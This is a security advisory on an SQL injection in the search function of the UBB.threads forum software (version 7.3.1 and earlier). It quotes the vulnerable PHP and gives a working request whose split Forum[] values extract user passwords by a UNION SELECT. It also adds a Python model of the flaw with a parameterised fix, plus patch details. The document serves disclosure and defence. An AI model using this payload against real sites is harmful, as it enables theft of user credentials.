UBB.threads SQL Injection
Vendor: Groupee, Inc.
Product: UBB.threads
Version: <= 7.3.1
Website: http://www.ubbcentral.com/
BID: 14052
CVE: CVE-2008-6970
OSVDB: 47954
SECUNIA: 31804
Description:
UBB.threads is a popular online forum system written in PHP that allows webmasters and site owners to host their own discussion forums within their website. Unfortunately UBB.threads is vulnerable to an SQL injection in its search functionality that may allow an attacker to execute arbitrary SQL queries against the underlying database. An updated version of UBB.threads has been released to address this issue and users should upgrade as soon as possible.


SQL Injection
There is an SQL injection issue within the UBB.threads search functionality that may allow an attacker to execute arbitrary SQL queries against the underlying database. The vulnerable code can be found in dosearch.inc.php:

// The forums we are searching will be in a different format
// depending on where we are coming from
if (@is_array($_POST['Forum'])) {
	$Forum = join(",",$_POST['Forum']);
}
elseif (@is_array($_GET['Forum'])) {
	$Forum = join(",",$_GET['Forum']);
}
elseif (isset($_POST['Forum'])) {
	$Forum = ",{$_POST['Forum']},";
}
elseif (isset($_GET['Forum'])) {
	$Forum = ",{$_GET['Forum']},";
}
else {
	$Forum = "";
}


As we can see in the above code, the $Forum variable is assigned unsanitized GET/POST data under each of the conditions: array values are joined with commas, scalar values are wrapped in commas, and nothing is validated. Shortly afterwards the following code is executed.

// Now we need to figure out what forums we are searching
$catin = "";
$boardin = "";
$allforums = "";
$forumlist = "";
$Forum = split(",",$Forum);
for($i=0;$i<...) {
	// [the remainder of the loop header and the start of the loop body,
	//  including the code that sets $bnum, are not reproduced in this
	//  copy of the advisory]
			foreach(... as $fid => $kids) {
				if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) {
					$boardin .="'$fid',";
				} // end if
			} // end foreach
		}
	}
}
$catin = preg_replace("/,$/","",$catin);
$boardin = preg_replace("/,$/","",$boardin);
$forumlist = preg_replace("/,$/","",$forumlist);
if ($catin) {
	$catin = "CATEGORY_ID IN ($catin)";
	if ($boardin) { $catin .= " OR "; }
}
if ($boardin) {
	$boardin = "FORUM_ID IN ($boardin)";
}
if (!$catin && !$boardin) {
	$catin = "1";
}

// Regular query  here, since all query vars come from within the script
$query = "
	SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE
	FROM {$config['TABLE_PREFIX']}FORUMS
	WHERE FORUM_IS_ACTIVE = '1'
	AND ($catin $boardin)
";
$sth = $dbh -> do_query($query,__LINE__,__FILE__);
$boardin = "";

At first this issue appears hard to exploit effectively: commas are out of the question, since the value is split on them, certain letters are out of the question as well, and everything taken from the $Forum array is wrapped in single quotes. However, each Forum[] element is quoted and appended to the IN list separately, so a payload can be spread across several elements, with the opening and closing quotes of each element supplying the string delimiters the injected SQL needs. An attacker can therefore make a search request like the one below (shown URL-decoded, except that %2b is the + operator) and successfully execute fairly dangerous SQL queries.

ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*

A couple of preconditions exist. First, a user must be logged in (a standard user account is enough). Second, in the specific example above the search actually has to return results, so in order to see the first character of the first user's password we have to specify a valid search term (the Words parameter) and a valid forum id (the first column of the UNION SELECT is 1, which is a valid forum id). Of course this is one quickly put together example, and other SQL injection attacks are possible as well.
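To make the assembly concrete, the following Python model (added for this edition of the advisory; it is not code from UBB.threads or from the original report) reproduces the comma join, the split and the single-quote wrapping that the search code applies to Forum[], feeds it the six values from the request above (URL-decoded, so %2b becomes +), and shows the query text that would reach MySQL. The stripping of the leading "f" type prefix is an assumption standing in for the loop body that this page does not reproduce. The hardened variant beside it, which accepts only f<digits> and passes the ids as bound parameters, is an illustration of the right fix rather than the vendor's patch.

```python
"""Model of the Forum[] handling in UBB.threads dosearch.inc.php (added example)."""
import re
from typing import List, Tuple

TABLE_PREFIX = "ubbt_"  # default prefix; the advisory's payload hard-codes ubbt_USERS

# Constructed input: the six Forum[] values from the advisory's request, URL-decoded.
ADVISORY_FORUM_PARAMS = [
    "f-99')) UNION SELECT '1",
    "f' + MID('' + USER_PASSWORD + '",
    "f1",
    "f1') + '",
    "f1",
    "f1' FROM ubbt_USERS/*",
]


def build_boardin_vulnerable(forum_params: List[str]) -> str:
    """Vulnerable flow: Forum[] is join()ed on commas, split() again, and every
    entry is wrapped in single quotes and appended to $boardin.
    ASSUMPTION: the leading 'f' type prefix is stripped before wrapping; the
    original loop body that does this is not reproduced in the advisory."""
    joined = ",".join(forum_params)          # $Forum = join(",", $_POST['Forum'])
    boardin = ""
    for entry in joined.split(","):          # $Forum = split(",", $Forum)
        if entry == "":
            continue
        bnum = entry[1:] if entry.startswith("f") else entry
        boardin += f"'{bnum}',"              # $boardin .= "'$fid',"
    return re.sub(r",$", "", boardin)        # preg_replace("/,$/", "", $boardin)


def build_query_vulnerable(forum_params: List[str]) -> str:
    """String-assembled query as in dosearch.inc.php, with the category branch empty."""
    boardin = f"FORUM_ID IN ({build_boardin_vulnerable(forum_params)})"
    return (
        "SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE "
        f"FROM {TABLE_PREFIX}FORUMS WHERE FORUM_IS_ACTIVE = '1' AND ( {boardin})"
    )


def parse_forum_ids_hardened(forum_params: List[str]) -> List[int]:
    """Illustrative fix: accept only f<digits> selectors and reject anything else."""
    ids: List[int] = []
    for entry in ",".join(forum_params).split(","):
        if entry == "":
            continue
        m = re.fullmatch(r"f(\d{1,10})", entry)
        if m is None:
            raise ValueError(f"rejected forum selector: {entry!r}")
        ids.append(int(m.group(1)))
    return ids


def build_query_hardened(forum_params: List[str]) -> Tuple[str, Tuple[int, ...]]:
    """Parameterised query: the ids travel as bound values, never as SQL text.
    An empty selection yields IN (NULL), which matches no rows."""
    ids = parse_forum_ids_hardened(forum_params)
    placeholders = ",".join(["%s"] * len(ids)) or "NULL"
    sql = (
        "SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE "
        f"FROM {TABLE_PREFIX}FORUMS WHERE FORUM_IS_ACTIVE = '1' "
        f"AND FORUM_ID IN ({placeholders})"
    )
    return sql, tuple(ids)


def hardened_rejects(forum_params: List[str]) -> bool:
    """True if the hardened parser refuses the given Forum[] values."""
    try:
        parse_forum_ids_hardened(forum_params)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The six quoted fragments fuse into one UNION SELECT; the trailing /* swallows
    # the closing quote and parentheses the original code appends.
    print(build_query_vulnerable(ADVISORY_FORUM_PARAMS))
    print(build_query_hardened(["f1", "f7"]))
    print("hardened version rejects payload:", hardened_rejects(ADVISORY_FORUM_PARAMS))
```

Running the block prints the fused statement: the first element closes the IN list and opens the UNION, the middle elements supply the four columns the outer SELECT expects, and the final element's /* comments out the `'))` that the original code appends, which is why no comma or closing quote is ever needed inside any single Forum[] value.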


Solution:
The UBB.threads developers were very prompt in addressing this issue and released a patch the same day we reported it to them. An updated version of UBB.threads can be found at the official UBB.threads website.

http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/


Credits:
James Bercegay of the GulfTech Security Research Team